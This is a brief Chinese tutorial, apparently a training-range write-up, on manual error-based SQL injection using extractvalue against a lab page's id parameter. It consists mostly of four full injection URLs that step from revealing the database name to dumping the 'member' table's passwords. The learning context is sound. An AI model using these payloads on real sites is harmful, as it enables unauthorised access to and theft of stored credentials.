珍惜少年时。
通过墨者学院靶场里的一道报错注入的题来了解一下如何使用extractvalue函数来手工报错注入。
这里主要是给大家展示一下playload。
先从爆库开始:
http://219.153.49.228:49919/new_list.php?id=1' and extractvalue(1,concat(0x7e,(database()),0x7e))--+
然后开始爆表:
http://219.153.49.228:49919/new_list.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1 ),0x7e));--+
然后开始爆表里的字段:
http://219.153.49.228:49919/new_list.php?id=1%27%20and%20extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='member' ),0x7e))--+
最后爆表里的数据:
http://219.153.49.228:49919/new_list.php?id=1%27%20and%20extractvalue(1,concat(0x7e,(select group_concat(password) from member ),0x7e))--+
这个函数还是挺好使的。
这次就到这里。
再见。
拜。